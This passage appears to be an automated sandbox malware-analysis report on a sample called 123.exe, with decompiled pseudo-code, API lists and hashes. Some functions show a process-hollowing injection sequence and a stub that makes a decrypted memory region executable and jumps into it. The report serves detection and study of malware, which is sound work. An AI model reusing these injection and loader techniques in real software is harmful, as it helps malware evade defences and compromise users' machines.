Opcode ID: ab60e91115133d0e1e844e325d50d6c3984673a8d2f99939d63f175f41e1c7dd
Instruction ID: 6679e4df68836f298b71802437413acbcb2f75ad1e65b4f13b61c7f84cdc01d5
Opcode Fuzzy Hash: ab60e91115133d0e1e844e325d50d6c3984673a8d2f99939d63f175f41e1c7dd
Instruction Fuzzy Hash: 00F0C23420438CAADF554FA0CC0DBEA3BACEF40344F048218FC48595A1CB74CA99EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A40FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00A40FE4(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00A36C31(E00A36C36(_t6, 0xa71098, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xa71098, 0xa71098, 2);
				}
				return _t2;
			}

0x00a40fe4
0x00a40fea
0x00a40ff3
0x00a40ffc
0x00000000
0x00a4101b
0x00a4101c

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00A41101,?,?,00A4117F,?,?,?,?,?,00A41169), ref: 00A40FEA
GetLastError.KERNEL32(?,?,00A4117F,?,?,?,?,?,00A41169), ref: 00A40FF6

Part of subcall function 00A36C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A36C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A40FFF

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d31da0cfedd59e59b08eb88120636f627b3c8d32a4ab6536de4c76c93b53960f
Instruction ID: cd299a2e070cba10f64a2f0b39563259c333d85efb4e78b254d900588d44c675
Opcode Fuzzy Hash: d31da0cfedd59e59b08eb88120636f627b3c8d32a4ab6536de4c76c93b53960f
Instruction Fuzzy Hash: E1D02E725081203ACA103328AD0AC6F3C249F62332F218B04F039642E2CB290D834292

Uniqueness

Uniqueness Score: -1.00%

Function 00A3E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3E29E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x00a3e2a1
0x00a3e2b1
0x00a3e2b9
0x00a3e2bb
0x00000000
0x00a3e2bb
0x00a3e2c0

APIs

GetModuleHandleW.KERNEL32(00000000,?,00A3DA55,?), ref: 00A3E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A3DA55,?), ref: 00A3E2B1

Strings

RTL, xrefs: 00A3E2AB

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 19a3d7be9f0f27fc9fd9546e612439b71b745a4dd705ef7b61abbae623c03ea8
Instruction ID: a383c82328c267f741d36b7a324648cba7d7f6e839108fc8f04592fd781118d2
Opcode Fuzzy Hash: 19a3d7be9f0f27fc9fd9546e612439b71b745a4dd705ef7b61abbae623c03ea8
Instruction Fuzzy Hash: 55C0123224071076EE30A7E46C0DB836A686B10B55F0A0848F281EA6D1DAF6C98B86A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 123.exePID: 2356, Parent PID: 6364COMMON

Executed Functions

Function 009587E1 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 467
memorythreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00958AC2
GetThreadContext.KERNELBASE(?,00010007), ref: 00958AD7
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00958AF8
NtUnmapViewOfSection.NTDLL(?,?), ref: 00958B12
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00958B2A
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00958B4A
VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040), ref: 00958B87
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00958C7D
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00958C9A
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 00958D04
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00958D26
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00958D41
SetThreadContext.KERNELBASE(?,00010007), ref: 00958D5E
ResumeThread.KERNELBASE(?), ref: 00958D6B

Strings

D, xrefs: 00958A1A

Memory Dump Source

Source File: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Virtual$Process$AllocMemoryThread$ContextProtectWrite$CreateFreeReadResumeSectionUnmapView
String ID: D
API String ID: 1767445798-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: 9c2bf4db2915e868eea99ba8d5969570b7429515b7981b0c4941083a2103cc5d
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: 0A120871D002199BDB25CFA5CC84BEEBBB9FF04705F1484A9E949F6290EB749A84CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00901CDA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00901CDA(void* __eflags, void* __fp0) {
				signed int _v8;
				long _v12;
				signed int _v16;
				unsigned int _v5008;
				char _v5012;
				char _v5016;
				signed int _v5020;
				signed int _v5028;
				intOrPtr _v5032;
				char _v5036;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				signed int _t48;
				unsigned int _t50;
				intOrPtr* _t57;
				intOrPtr _t60;
				intOrPtr _t66;
				void* _t67;
				void* _t77;
				void* _t82;
				void* _t83;
				void* _t86;
				signed int _t88;
				intOrPtr* _t95;
				intOrPtr _t100;
				unsigned int _t111;
				void* _t121;
				intOrPtr* _t123;
				void* _t126;
				void* _t127;
				signed int _t128;
				intOrPtr* _t129;
				signed int _t130;
				void* _t131;
				void* _t133;
				signed int _t135;
				signed int _t137;
				void* _t140;
				void* _t152;

				_t152 = __fp0;
				_t140 = __eflags;
				_t135 = _t137;
				E00905E20(0x13a8);
				_t46 =  *0x92c014; // 0xb29a853a
				_v8 = _t46 ^ _t135;
				_push(_t127);
				_t48 = E00905299(_t127, _t140, 0x28);
				_t86 = _t121;
				_t128 = _t48;
				_v5020 = _t128;
				_t3 = _t128 + 0x28; // 0x28
				_t82 = _t3;
				E00906480(_t121, _t128, 0, 0x28);
				_t50 = E00904B3F(_t86, _t140); // executed
				_v16 = _v16 | 0xffffffff;
				_t111 = _t50;
				_v5008 = _t111;
				_t88 = 1;
				do {
					_t111 = (_t111 >> 0x0000001e ^ _t111) * 0x6c078965 + _t88;
					 *(_t135 + _t88 * 4 - 0x138c) = _t111;
					_t88 = _t88 + 1;
					_t142 = _t88 - 0x270;
				} while (_t88 < 0x270);
				_v5028 = _v5028 | 0xffffffff;
				_v5012 = 0x270;
				_v5036 =  &_v5012;
				_v5032 = 0x20;
				E00902907( &_v5036, _t128, _t82);
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x13a8], xmm0");
				 *0x959fd4 = GetModuleHandleW(L"kernel32.dll");
				_t57 = E00905299(_t128, _t142, 0x14);
				_v12 = _t57;
				 *_t57 = 0;
				_t18 = _t57 + 8; // 0x8
				_t123 = _t18;
				 *((intOrPtr*)(_t57 + 4)) = 0;
				 *((intOrPtr*)(_t57 + 0xc)) = 0;
				 *((intOrPtr*)(_t57 + 0x10)) = 0;
				_push( &_v5016);
				 *_t123 = 0;
				 *((intOrPtr*)(_t123 + 4)) = 0;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				_push(0);
				_v5016 = 0x84;
				E009029D1(_t82, _t123, _t123, _t128, _t142);
				_t129 = _v12;
				_t60 = 0;
				_v5016 = 0;
				do {
					 *_t129 = _t60;
					_t95 =  *((intOrPtr*)(_t123 + 4));
					if(_t95 ==  *((intOrPtr*)(_t123 + 8))) {
						_push(_t129);
						_push(_t95);
						E009029D1(_t82, _t123, _t123, _t129, __eflags);
						_t60 = _v5016;
					} else {
						 *_t95 = _t60;
						 *((intOrPtr*)(_t123 + 4)) =  *((intOrPtr*)(_t123 + 4)) + 4;
					}
					_t60 = _t60 + 1;
					_v5016 = _t60;
				} while (_t60 < 0x64);
				_t130 = _v5020;
				_v12 = 0;
				_t113 = _t82;
				E00902C71(_t130, _t82, _t82 - _t130 >> 2, _v12);
				_t66 = _v5036;
				_t100 = _v5032;
				do {
					_t66 = _t66 + 1;
					asm("adc ecx, 0x0");
				} while (_t66 == 0 && _t66 <= 0x5f5e100);
				_t67 = _t66 + 1;
				asm("adc ecx, 0x0");
				_v5032 = _t100;
				if(_t67 != 0 || _t67 >= 0x5f5e0ff) {
					_push(_t100);
					_t131 =  &E00958660;
					E00901B16(_t131, 0x77e, _t152);
					E00901B16(0x92ca60, 0x2bc00, _t152);
					_v12 = _v12 & 0x00000000;
					E00901B81();
					VirtualProtect(_t131, 0x77e, 0x40,  &_v12); // executed
					_push(0x92ca60);
					_push(0);
					_push( *0x958de0);
					asm("loop 0xffffffff");
					_t77 =  &E00958660 + 0x22;
					_push(0);
					_push(_t77);
					return _t77;
				} else {
					__eflags = _t130;
					if(_t130 != 0) {
						_t85 = _t82 - _t130 & 0xfffffffc;
						__eflags = _t82 - _t130 & 0xfffffffc;
						E009024C1(_t82 - _t130 & 0xfffffffc, _t100, _t113, _t123, _t130, _t130, _t85);
					}
					_pop(_t126);
					_pop(_t133);
					__eflags = _v8 ^ _t135;
					_pop(_t83);
					return E0090528B(0, _t83, _v8 ^ _t135, _t113, _t126, _t133);
				}
			}

0x00901cda
0x00901cda
0x00901cdb
0x00901ce2
0x00901ce7
0x00901cee
0x00901cf2
0x00901cf6
0x00901cfb
0x00901cfc
0x00901d03
0x00901d09
0x00901d09
0x00901d0c
0x00901d14
0x00901d19
0x00901d1d
0x00901d21
0x00901d27
0x00901d2d
0x00901d3a
0x00901d3c
0x00901d43
0x00901d44
0x00901d44
0x00901d48
0x00901d5d
0x00901d63
0x00901d69
0x00901d73
0x00901d7a
0x00901d82
0x00901d92
0x00901d97
0x00901d9f
0x00901da2
0x00901da4
0x00901da4
0x00901da7
0x00901daa
0x00901dad
0x00901db6
0x00901db7
0x00901db9
0x00901dbc
0x00901dbf
0x00901dc2
0x00901dcc
0x00901dd1
0x00901dd4
0x00901dd6
0x00901ddc
0x00901ddc
0x00901dde
0x00901de4
0x00901dee
0x00901def
0x00901df2
0x00901df7
0x00901de6
0x00901de6
0x00901de8
0x00901de8
0x00901dfd
0x00901dfe
0x00901e04
0x00901e09
0x00901e13
0x00901e1d
0x00901e22
0x00901e27
0x00901e2f
0x00901e35
0x00901e35
0x00901e38
0x00901e38
0x00901e44
0x00901e47
0x00901e4a
0x00901e50
0x00901e59
0x00901e5f
0x00901e68
0x00901e77
0x00901e7c
0x00901e81
0x00901e94
0x00901e9d
0x00901ea2
0x00901eae
0x00901ec1
0x00901ec3
0x00901ec5
0x00901ec7
0x00901ec8
0x00901ecf
0x00901ecf
0x00901ed1
0x00901ed5
0x00901ed5
0x00901eda
0x00901ee0
0x00901ee6
0x00901ee7
0x00901ee8
0x00901eea
0x00901ef1
0x00901ef1

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00901D8A
VirtualProtect.KERNELBASE(00958660,0000077E,00000040,00000000,?,?,00000000,?), ref: 00901E94

Part of subcall function 009029D1: __EH_prolog3_catch.LIBCMT ref: 009029D8

Strings

kernel32.dll, xrefs: 00901D7D
, xrefs: 00901D69

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchHandleModuleProtectVirtual
String ID: $kernel32.dll
API String ID: 2053513580-2116778257
Opcode ID: d1ec8a76170aa56aff0360bee2f598e94cef9b374ceca9991edf3fbb53f04e56
Instruction ID: 9ac518489db9216a7825bd6c56e46f9ceb8de9d7277084c3cd376e16b8829d41
Opcode Fuzzy Hash: d1ec8a76170aa56aff0360bee2f598e94cef9b374ceca9991edf3fbb53f04e56
Instruction Fuzzy Hash: 975181B2E042189FDB18DF68DC467EAB7E5EF88710F1441AEE409E72D1DB709E818B54

Uniqueness

Uniqueness Score: -1.00%

Function 009058FF Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009058FF() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0090590B); // executed
				return _t1;
			}

0x00905904
0x0090590a

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000590B,009050F2), ref: 00905904

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9b41b8a4a02f9329ed3cf0894437efe79efdd00cc1cfd399d74ed10a95c15cf1
Instruction ID: 666681f71f69b60d76164005aa774a5ed914410508b4a3f9b021e08889ca7a1c
Opcode Fuzzy Hash: 9b41b8a4a02f9329ed3cf0894437efe79efdd00cc1cfd399d74ed10a95c15cf1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00910024 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00910024(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x959bd0 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x91f900 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E0090F1C8(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E0090F1C8(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x0091002d
0x009100d7
0x00910035
0x00910037
0x0091003e
0x00910040
0x00910046
0x00910053
0x00910062
0x00910068
0x0091006c
0x009100be
0x009100be
0x009100c3
0x009100c7
0x009100ca
0x009100ca
0x009100d0
0x009100d2
0x009100e7
0x009100e2
0x009100e6
0x009100e6
0x009100d4
0x009100d4
0x00000000
0x009100d4
0x0091006e
0x00910077
0x009100ae
0x009100ae
0x009100b0
0x009100b2
0x00000000
0x00000000
0x009100ba
0x00000000
0x009100ba
0x00910081
0x00910086
0x0091008b
0x00000000
0x00000000
0x00910095
0x0091009a
0x0091009f
0x00000000
0x00000000
0x009100a4
0x009100aa
0x00000000
0x009100aa
0x0091004b
0x00000000
0x00000000
0x00000000
0x00910051
0x009100e0
0x00000000

Strings

ext-ms-, xrefs: 0091008F
api-ms-, xrefs: 0091007B

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 5d72fffc63e6ed962e4f47f66e336e20efc4f90f6f88c83c8abd1b7a9ba5481c
Instruction ID: 33c3bb7a9447c7b0f3044b2ea1a782054ace5ccf43a81a7e5720d833ce5db28e
Opcode Fuzzy Hash: 5d72fffc63e6ed962e4f47f66e336e20efc4f90f6f88c83c8abd1b7a9ba5481c
Instruction Fuzzy Hash: 1321A572B0532CEBDB318B249C81BDA775CAF89760F254520E919B7290DAF2DDC1D6E0

Uniqueness

Uniqueness Score: -1.00%

Function 009134C6 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E009134C6(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x92c014; // 0xb29a853a
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E0090C04D(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E00915855(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E0090528B(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E0090501C(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E00915855(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E009104BA(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E009104BA(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E0090501C(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E009158D1();
									if(_t95 != 0) {
										E0090501C(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E0091062B(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E00905660(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E009104BA(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E0091062B(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E00905660(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x009134cb
0x009134cc
0x009134cd
0x009134d4
0x009134d9
0x009134df
0x009134e5
0x009134eb
0x009134ee
0x009134ee
0x009134f1
0x009134f3
0x009134f3
0x009134f1
0x009134f5
0x009134fa
0x00913501
0x00913504
0x00913504
0x00913525
0x00913527
0x0091352a
0x0091352f
0x0091368d
0x00913690
0x00913691
0x00913692
0x0091369e
0x00913535
0x00913538
0x0091353d
0x0091353f
0x00913541
0x00913578
0x0091357a
0x0091357c
0x00913682
0x00913682
0x00913684
0x00913685
0x0091368b
0x00000000
0x0091368b
0x0091358b
0x00913590
0x00913595
0x00000000
0x00000000
0x0091359b
0x009135ad
0x009135b2
0x009135b6
0x00000000
0x00000000
0x009135bc
0x009135c4
0x00913601
0x00913606
0x00913608
0x0091360a
0x0091363b
0x0091363d
0x0091363f
0x0091367b
0x0091367c
0x00000000
0x0091365c
0x0091365e
0x0091365f
0x00913663
0x0091369f
0x009136a2
0x00913665
0x00913665
0x00913666
0x00913666
0x00913667
0x00913668
0x00913669
0x0091366a
0x00913672
0x00913679
0x009136a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00913679
0x0091363f
0x0091360e
0x00913629
0x0091362e
0x00000000
0x00000000
0x00913630
0x00913636
0x00913636
0x00000000
0x00913636
0x00913610
0x00913615
0x00913619
0x00000000
0x00000000
0x0091361b
0x00000000
0x0091361b
0x009135c6
0x009135cb
0x00000000
0x00000000
0x009135d3
0x00000000
0x00000000
0x009135ef
0x009135f3
0x00000000
0x00000000
0x00000000
0x009135f9
0x00913548
0x00913563
0x00913568
0x00913573
0x00913573
0x00000000
0x00913573
0x0091356a
0x00913570
0x00913570
0x00000000
0x00913570
0x0091354a
0x0091354f
0x00913553
0x00000000
0x00000000
0x00913555
0x00000000
0x00913555

APIs

__alloca_probe_16.LIBCMT ref: 0091354A
__alloca_probe_16.LIBCMT ref: 00913610
__freea.LIBCMT ref: 0091367C

Part of subcall function 0091062B: RtlAllocateHeap.NTDLL(00000000,?,?,?,00905E75,?,?,?,?,?,00901137,?,?), ref: 0091065D

__freea.LIBCMT ref: 00913685
__freea.LIBCMT ref: 009136A8

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: ee390ffd4ec427f49409d1cc964147a81510d0822afe406e123232496e5e5b1c
Instruction ID: 69bb54c135d8659a5aa3690e237802dc2eed93efd42400e23be95f87b14c5ced
Opcode Fuzzy Hash: ee390ffd4ec427f49409d1cc964147a81510d0822afe406e123232496e5e5b1c
Instruction Fuzzy Hash: F951917270020EBFEB215E548C42FEB36BDEB84794F168268F90897250E775DE9196A0

Uniqueness

Uniqueness Score: -1.00%

Function 0090D830 Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0090D830(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
